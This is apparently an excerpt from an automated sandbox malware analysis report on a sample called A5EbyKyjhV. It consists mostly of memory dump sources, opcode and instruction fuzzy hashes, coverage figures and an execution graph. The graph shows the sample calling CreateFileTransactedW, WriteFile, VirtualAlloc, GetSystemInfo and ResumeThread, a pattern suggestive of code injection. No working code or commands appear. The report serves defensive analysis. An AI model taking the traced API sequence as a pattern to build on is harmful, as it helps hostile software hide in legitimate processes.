                                                  • Opcode Fuzzy Hash: edb4b053c7855bf8a67a3f6234543c45209e5b84338c569e9a63ab8ca0cda948
                                                  • Instruction Fuzzy Hash: 7481383192DA468BF7689B28A4055B5B7E2EF46710B14857ED08FD3592FE28FC068FC1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af37c577b35cf7e722bb674703a8b69c53b76d907d1340c5497ed86d76ecd761
                                                  • Instruction ID: 3860daf79bb91a27e643714b915dbe470e05761c731db5165fde4675ced6bc11
                                                  • Opcode Fuzzy Hash: af37c577b35cf7e722bb674703a8b69c53b76d907d1340c5497ed86d76ecd761
                                                  • Instruction Fuzzy Hash: 4A81D22191EA41DBF72ADF2894455757BE0EF46310B14A57FE08FC3592DF29B80A8781
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 883a94cdabace72af3619d32ac20c37f59afe11f5e3efbf33052a7c70aff173c
                                                  • Instruction ID: 7b6d127b9fc1af1422a2120f4cffbf287cd630235445d9a404f6ae1eed250a4c
                                                  • Opcode Fuzzy Hash: 883a94cdabace72af3619d32ac20c37f59afe11f5e3efbf33052a7c70aff173c
                                                  • Instruction Fuzzy Hash: 8171793590E68ACFF76ADB1888565B437C0FF46351B00BAB9D49EC7552DE18E80E87C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d24585fbab024d2754ac23b2bb1914f1e7381c873deb4308174276ed08c340b4
                                                  • Instruction ID: e3ff289f0609aa5d87ccd1c89ae0ff77fee5c031e4f2cbdc473f83928e44387e
                                                  • Opcode Fuzzy Hash: d24585fbab024d2754ac23b2bb1914f1e7381c873deb4308174276ed08c340b4
                                                  • Instruction Fuzzy Hash: FB71E731A0994ACFF769EB08C8455B437D1FF5A311B14A27AE45EC7563EB2CE80A87C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68c46831cdfddc81a0c143ad142bc084c370d6fff808d947e2a1a73331502c78
                                                  • Instruction ID: a63c1e29d9119a9997ee587485f1aa94e7fac4721e652c8450abf56312b629e4
                                                  • Opcode Fuzzy Hash: 68c46831cdfddc81a0c143ad142bc084c370d6fff808d947e2a1a73331502c78
                                                  • Instruction Fuzzy Hash: D771353992E549CFF768DB18A8165F537C2FF46710B0482B9D45EC3552EE18E80E8BC2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f62302a6748f15571677542ffc6c664cc0dcc1cdea6f5bc04fb8558ad30159d
                                                  • Instruction ID: 8037072bb5dade12b723fb87ccf03681ccc936b98416f09afb2d9032cbd17bc8
                                                  • Opcode Fuzzy Hash: 5f62302a6748f15571677542ffc6c664cc0dcc1cdea6f5bc04fb8558ad30159d
                                                  • Instruction Fuzzy Hash: 39711231A2E5498FF768DF18A8465B937C2FF46710B1482B9D09FC7552EE18E81E87C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba70d21a2227ef5ed4a3bafdaabc85d53746ada00df8d5eaae32165dde373c8b
                                                  • Instruction ID: e0be64faf22951fa78e94a60a849414173b8e212be9347b41181c6b2ef3599ad
                                                  • Opcode Fuzzy Hash: ba70d21a2227ef5ed4a3bafdaabc85d53746ada00df8d5eaae32165dde373c8b
                                                  • Instruction Fuzzy Hash: 9261F47160D9898FF76ADB18C8555B83BD0FF86311B04A2BAF05ED75A3DA18E809C7C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d967f66093b16713b245803b395f00f98bdf876a3ce2d93e5fc8b32ecb72aaf
                                                  • Instruction ID: 7435ce206bc2c70dc5a2e162f2139b274f82e3f8f783f7df70e5c5c6514627bb
                                                  • Opcode Fuzzy Hash: 1d967f66093b16713b245803b395f00f98bdf876a3ce2d93e5fc8b32ecb72aaf
                                                  • Instruction Fuzzy Hash: AE81E13050AB46CFF76ADB15C59057177A1FF06300B10B97ED0AE87A92DB29F84ACB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f49963c0c2eed57930dca6fca15e3855cb95b3e744c46a7a2589783f1f861caf
                                                  • Instruction ID: a7a328b881e4829e225c161400bd98c4e3ea8cd94a878a9920b123fd488f62b0
                                                  • Opcode Fuzzy Hash: f49963c0c2eed57930dca6fca15e3855cb95b3e744c46a7a2589783f1f861caf
                                                  • Instruction Fuzzy Hash: 1151273050EB498FE75ADB2898455707BE0EF5632471952BFD08EC71A3DA29F84BC781
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87f90e2a71fb1c3648773eda83274944e95c379fb7344de292bd9254ce14e441
                                                  • Instruction ID: 76767650194b489aee3197c756397fdf67b1414e37b2cfbe4a93c2a00478b9e6
                                                  • Opcode Fuzzy Hash: 87f90e2a71fb1c3648773eda83274944e95c379fb7344de292bd9254ce14e441
                                                  • Instruction Fuzzy Hash: 1751353192E549CFF768DB18E8569B877C2FF96710B0442B9D05EC7562FA2CE80987C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26af532d3ca5646f5b157b6be466e065923003a41ca880bea22c3b6a9e82cda5
                                                  • Instruction ID: 9a9f73b7fded213b22289e5655ce8c74105da31e34acdf5eca63ddab5fd7d7b0
                                                  • Opcode Fuzzy Hash: 26af532d3ca5646f5b157b6be466e065923003a41ca880bea22c3b6a9e82cda5
                                                  • Instruction Fuzzy Hash: B1112B2161C98D8FEB51DB29D4419F977D1EF55250B40897AD08FC75D3DE28F50983C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 425b20e668e5b762ecac1b7ce94e0610f59a5a0f63a289f09501832a844ebc07
                                                  • Instruction ID: 932c12940ad5bfe5e4a1c31c6c1f626559c526b3ab5b6f77d07793f296d52a09
                                                  • Opcode Fuzzy Hash: 425b20e668e5b762ecac1b7ce94e0610f59a5a0f63a289f09501832a844ebc07
                                                  • Instruction Fuzzy Hash: CF119431B29E4A8BEB59DB5C8091568B3E1FF86710754A1BAE00EC7282CF24FC1686C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b3cfbcebe2bb701527467b8e27c9b295230ce2f106850f8c811ad3f1d6291a4
                                                  • Instruction ID: be81f164ef60e19823328904270506954b7f96ba2950da1bb3d91c7f05409019
                                                  • Opcode Fuzzy Hash: 2b3cfbcebe2bb701527467b8e27c9b295230ce2f106850f8c811ad3f1d6291a4
                                                  • Instruction Fuzzy Hash: 2911E72160CA498FEB55DB29E8509FA7791EF95250B409A7BE44FC74D3CE14F949C3C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ff49249b0288395481a9b966d20c544fc3d7ba408a1d90991af070b13ef062b
                                                  • Instruction ID: b485e48c163760fc3f3431fb5184b962e1ce44faf64f893ebed320f3d9f1f604
                                                  • Opcode Fuzzy Hash: 9ff49249b0288395481a9b966d20c544fc3d7ba408a1d90991af070b13ef062b
                                                  • Instruction Fuzzy Hash: A411883230858A8FFB05CB1CE8557E53790EB92360F54867FE90AC76C1DAA5E919C7C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea667b64f66ec382183780a01092bc25a461eaf3e0156cb974f2213b4f817799
                                                  • Instruction ID: 42fab060767765ccf59ed7d14be551cb0394a270287c659e7b9e96178687001f
                                                  • Opcode Fuzzy Hash: ea667b64f66ec382183780a01092bc25a461eaf3e0156cb974f2213b4f817799
                                                  • Instruction Fuzzy Hash: 5811E561A0E65EDBF766D26448052BA7795EF87740F00A17BE00EDB2D2DF54A80A83C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 230cc4a24b4db1e2f0861264dd4481b4344abc5a6ae74706ba406a75bfd7983d
                                                  • Instruction ID: ac5051aac68d4eaafb2fa035833339143a482cd4f6a8dfd58a6571fbc96f9b58
                                                  • Opcode Fuzzy Hash: 230cc4a24b4db1e2f0861264dd4481b4344abc5a6ae74706ba406a75bfd7983d
                                                  • Instruction Fuzzy Hash: DA118C323089898BEB05CF1CE8506E87B82DB82360F90867FD91AC71D1D666E554C3C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: befb301f3cc3d2af23a209e63401db6a9c8b8c939cf106119773fa4057f6f9ec
                                                  • Instruction ID: b05f631660002843e94fbcb7fdcf9486e0fd7453d30137fe35cec02318b21d55
                                                  • Opcode Fuzzy Hash: befb301f3cc3d2af23a209e63401db6a9c8b8c939cf106119773fa4057f6f9ec
                                                  • Instruction Fuzzy Hash: A611883220D68A4FEB05CF2CE8506E93B91EB92320F14867FE90AC72C2CB65E544C7C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d83b3ae9ac74ceb98993f73e874768d064622f8094516e61b9ffba7aa0e1e686
                                                  • Instruction ID: 552e2ae4d11f9cb901a4eb32a6ce7c2b28f2d04c99d5f7abd8d1aff5d7bf0729
                                                  • Opcode Fuzzy Hash: d83b3ae9ac74ceb98993f73e874768d064622f8094516e61b9ffba7aa0e1e686
                                                  • Instruction Fuzzy Hash: 09110330608A088FDB98DF18D895A69B7E2FF59301B5145AED04ED76A2CF719C45CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6d39120a583e044b2516b42710fe622719ffd7bbda32744a887b5a73699d474
                                                  • Instruction ID: 18d10b1c7f0269a8181a19f3678e794d3a00a3e2210e4e3a0e5f9d83482c8e0f
                                                  • Opcode Fuzzy Hash: b6d39120a583e044b2516b42710fe622719ffd7bbda32744a887b5a73699d474
                                                  • Instruction Fuzzy Hash: 4701DB31B0DA898FEB45EBA894516FC7BA0EF46320F54807EE04ED71C3CE15984587C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5e783389e935c44df516e46729f2e0c27b59c9659efabccbed186aaef76abe1
                                                  • Instruction ID: e07be26851e355f96d3c3e7c9e62de08d1d24bcf7aba9f5e4b78efad3268dde6
                                                  • Opcode Fuzzy Hash: b5e783389e935c44df516e46729f2e0c27b59c9659efabccbed186aaef76abe1
                                                  • Instruction Fuzzy Hash: C5116B3220D18A8FEB06CB68A8519F47BC1DF43360F0486BBD50ACB192DA55A918C7C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66dbd53ee6e029a1ec9dadeedb3ebd6ec683b8212cfaa8f3fd0ec336107fb4bc
                                                  • Instruction ID: d336786e348cbbe28662aa80cd39fc8f8d9cf95f33404478db08caa572133e66
                                                  • Opcode Fuzzy Hash: 66dbd53ee6e029a1ec9dadeedb3ebd6ec683b8212cfaa8f3fd0ec336107fb4bc
                                                  • Instruction Fuzzy Hash: E411C83144E28ACFDB02DB64D8518D47FB0EF43314B1451E6E40DDB0A3D729994ACBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70e02d57c363edb8db2e9cea664fd8f06a6ee7f480ec919ac63cce42b49b882f
                                                  • Instruction ID: 63dffc4a9ca38068e205c1f399607f2e2e3a63194d264018ef87270411b10088
                                                  • Opcode Fuzzy Hash: 70e02d57c363edb8db2e9cea664fd8f06a6ee7f480ec919ac63cce42b49b882f
                                                  • Instruction Fuzzy Hash: ACF0FC3270CA484FDB58DB2CAC166FD77C2EB89221B54457FE18FC3562DE6198424780
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ff1b53e3db521683a81350465709529859cf77eb9687728b4454b60b099ae30
                                                  • Instruction ID: c31722167a9a5e68bbf1921f5b971edb1ee7b8b9b652ad9f7a9ae895d9686f99
                                                  • Opcode Fuzzy Hash: 4ff1b53e3db521683a81350465709529859cf77eb9687728b4454b60b099ae30
                                                  • Instruction Fuzzy Hash: D711957092991EDFDB94DB98E4909FDB7B2FF59700F504079E00EE3290DA35A8059B54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16962dacdc87cea6817217e2494fec4df7d542f33fce092a7392694454fda1e4
                                                  • Instruction ID: 6fb55ce06d1a07eb9c077c77948893d5b69acd48690a5b102d4d0ddf1a0cb947
                                                  • Opcode Fuzzy Hash: 16962dacdc87cea6817217e2494fec4df7d542f33fce092a7392694454fda1e4
                                                  • Instruction Fuzzy Hash: 5E017530A09A488FD799DF28C899A69B7E2FF59300F4081AED04ED76A1CF70AC41CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b93468687f632017e55e4fbf11e5a75794deea232168ba0f36dcea365e33627b
                                                  • Instruction ID: aaf6fce78fecf17d5f4c1c5622ed38c5da21f15331c4e76e3e2a5f2ef0a48656
                                                  • Opcode Fuzzy Hash: b93468687f632017e55e4fbf11e5a75794deea232168ba0f36dcea365e33627b
                                                  • Instruction Fuzzy Hash: FD017C3050440A8BDB98EF54D0C2DAAB361EFA531171082B5D40ECB35BCA28FD95C7D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57e96cac61cd2cc2c44d9d6784256e81ea2c8b3469efc19496777e096aad52d6
                                                  • Instruction ID: 8f4139f8b2f4f058b15a59f15c98a1bffa96450752dc540f8677e3aecff811e4
                                                  • Opcode Fuzzy Hash: 57e96cac61cd2cc2c44d9d6784256e81ea2c8b3469efc19496777e096aad52d6
                                                  • Instruction Fuzzy Hash: 28F0623285F3C6EFE7128B7098515E53FA5AF43604B1840F6D1498B0A2D96D951ACBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 586995d4686cf2d513e7ecdf5da901541eed1097c5e29e011bf0525e5ac09271
                                                  • Instruction ID: 5de4e45f426c41aec71bdef7983e126e1061902fbdd57f4dd97813049e0836ea
                                                  • Opcode Fuzzy Hash: 586995d4686cf2d513e7ecdf5da901541eed1097c5e29e011bf0525e5ac09271
                                                  • Instruction Fuzzy Hash: 48F0963144E2C5DFE703CB7088115A63FB5BF43204B1540E7F049C70A2CA2D965AC7A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de4177598aebd9feac47193770ddc0c67ed69d841dac129801d5b04529bc54a0
                                                  • Instruction ID: 3404b92ebdb0c2db66542f02e8ec12f51eb6b821dc6e6a5b76233df3d67a451d
                                                  • Opcode Fuzzy Hash: de4177598aebd9feac47193770ddc0c67ed69d841dac129801d5b04529bc54a0
                                                  • Instruction Fuzzy Hash: 19015470909A5DCFDF59EB98C895AACBBB1FB69341F20519DC00EEB251CB31A842DF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cabe967783fb6c59c8231c5bd3a30468f47d2b66c846688b378657977c6d7a5c
                                                  • Instruction ID: 7dea4a20619cad4d9ec0e3bae26ec0c4e50398c3856535325126d5e7fe09d8de
                                                  • Opcode Fuzzy Hash: cabe967783fb6c59c8231c5bd3a30468f47d2b66c846688b378657977c6d7a5c
                                                  • Instruction Fuzzy Hash: 25F0C23185E2C5DFE7168B70D8154A53FA1AF03210F0880F6D48DC70A2E96D9A0EC791
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a81232a79d05a4317bdf951633ec2871566644c89b1faf8e91478660e57e11ad
                                                  • Instruction ID: 08992629480d8bc3576217b0571f2539841a41e4d77ba0e184b3166c865cc3b9
                                                  • Opcode Fuzzy Hash: a81232a79d05a4317bdf951633ec2871566644c89b1faf8e91478660e57e11ad
                                                  • Instruction Fuzzy Hash: 0DF0E970E59A888FEB56E7B444912AC7BE0EF46300F14546EF04DC62CBDF2898428780
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                  • Instruction ID: 58e30ced962818f221b6947b25103bd1086261888594492f3bbbd042ed1cad9c
                                                  • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                  • Instruction Fuzzy Hash: 97F0B27490A958DFCB55EBA8C85AE99BBB0FF69300F1041DDD00AEB262CA219845CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 391eee7772a162e7ce35f6cf0d69d1a58b08f3392d46d7b2786ac6a43d3817a2
                                                  • Instruction ID: 8fe495a0feefa20fea7e7bff16e0742d1317a9d4bde097cce4f93e74535b0535
                                                  • Opcode Fuzzy Hash: 391eee7772a162e7ce35f6cf0d69d1a58b08f3392d46d7b2786ac6a43d3817a2
                                                  • Instruction Fuzzy Hash: 6FE0653080964DCFDB59EF2884412AA7BA0FF4A304F00816AF40C83185CB7AD6A8CBC0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2b4392ad685b4bef5da1a57bb79477ad11314188e80cc98aa6a5028ba8833ce
                                                  • Instruction ID: 30ae3b7afcc305ae77ca5d079a4cab3e47aec313d733f501165977d03128fec3
                                                  • Opcode Fuzzy Hash: a2b4392ad685b4bef5da1a57bb79477ad11314188e80cc98aa6a5028ba8833ce

                                                  Execution Graph

                                                  Execution Coverage:12.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:32
                                                  Total number of Limit Nodes:2
                                                  execution_graph 23836 7ffaac4fa397 23837 7ffaac4fa39c 23836->23837 23840 7ffaac4f9fb0 23837->23840 23839 7ffaac4fa400 23841 7ffaac4f9fb9 CreateFileTransactedW 23840->23841 23843 7ffaac4fbba8 23841->23843 23843->23839 23811 7ffaac4fbc35 23812 7ffaac4fbc5f WriteFile 23811->23812 23814 7ffaac4fbdcf 23812->23814 23815 7ffaac4fda35 23816 7ffaac4fda5f VirtualAlloc 23815->23816 23818 7ffaac4fdb7f 23816->23818 23844 7ffaac4fd154 23845 7ffaac4fd15a 23844->23845 23848 7ffaac4fd59a 23845->23848 23847 7ffaac4fd160 23849 7ffaac4fd5a5 23848->23849 23850 7ffaac4fd5ed GetSystemInfo 23848->23850 23849->23847 23852 7ffaac4fd6c5 23850->23852 23852->23847 23819 7ffaac4fd5d1 23820 7ffaac4fd5ed GetSystemInfo 23819->23820 23822 7ffaac4fd6c5 23820->23822 23823 7ffaac4f9ebd 23824 7ffaac55ff20 23823->23824 23827 7ffaac55f110 23824->23827 23826 7ffaac560009 23829 7ffaac55f11b 23827->23829 23828 7ffaac55f1be 23828->23826 23829->23828 23831 7ffaac55f1d7 23829->23831 23832 7ffaac55f22a ResumeThread 23831->23832 23833 7ffaac55f1e2 23831->23833 23835 7ffaac55f2f4 23832->23835 23833->23828 23835->23828

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
